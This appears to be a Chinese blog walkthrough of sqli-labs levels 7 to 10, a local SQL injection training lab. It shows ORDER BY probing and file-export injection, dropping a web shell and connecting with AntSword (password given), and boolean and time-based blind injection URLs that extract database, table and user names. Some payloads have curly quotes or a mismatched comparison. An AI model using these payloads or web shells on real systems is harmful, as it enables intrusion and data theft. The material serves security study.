sqllib 7-10
其实less5、less6打了差不多的话这边其实过起来蛮快的,时间隔太长了,再打一次当复习了。
less7
7的位置其实我觉得略微尴尬,和前后关卡关系不大
image-20210121145750495
通过order by来确定字段数
image-20210121150316810
绝对路径不对什么也没有获得到,之前改过的配置文件现在不见了,简直离奇
image-20210121155144911
mysql命令行查询,果然有问题,还得再手动设置一次
在my.ini中添加
image-20210121155527594
查的时候是说直接=就行,但是在我这里不太行,就加了个“/”,
image-20210121155652236
导出成功
image-20210121155745775
方法一
同前面几关,
image-20210121160549183
输入查询数据,在导出的文件中获取信息
image-20210121161015528
image-20210121161424249
image-20210121161441899
因为查询语句中没有限制是哪个数据库,所以显示出来的结果就不太一样
image-20210121162627151
image-20210121162618357
方法二
使用蚁剑控制木马实现爆破
image-20210122125351241
先扔个木马进去
用蚁剑连接
密码即为mmye
image-20210122130151941
至于剩下的嘛,给你一个眼神自己体会
less8
这边不允许了报错注入,可以尝试一下布尔盲注和延时盲注
image-20210122133953208
image-20210122134114338
那就慢慢的猜下去
image-20210122134152534
以此继续推出column,然后在推出username和password
less9、10
less9
标题说了时间盲注单引号
那么就
http://127.0.0.1/sqllib/Less-9/?id=1' and if(substr(database(),8,1)=’security’,1,sleep(5)) –+
http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101,1,sleep(5))–+
http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select column_name from information_schema.columns where table_name=’users’ limit 0,1),1,1))=105,1,sleep(5))–+
http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))–+
less10
也就是在less9 基础上将单引号改成双引号
这两关在正确时直接回显,错误时进行延时加载
- 本文作者:Almond
- 本文链接:http://example.com/2021/01/15/sqllib-7-10/index.html
- 版权声明:本博客所有文章均采用 BY-NC-SA 许可协议,转载请注明出处!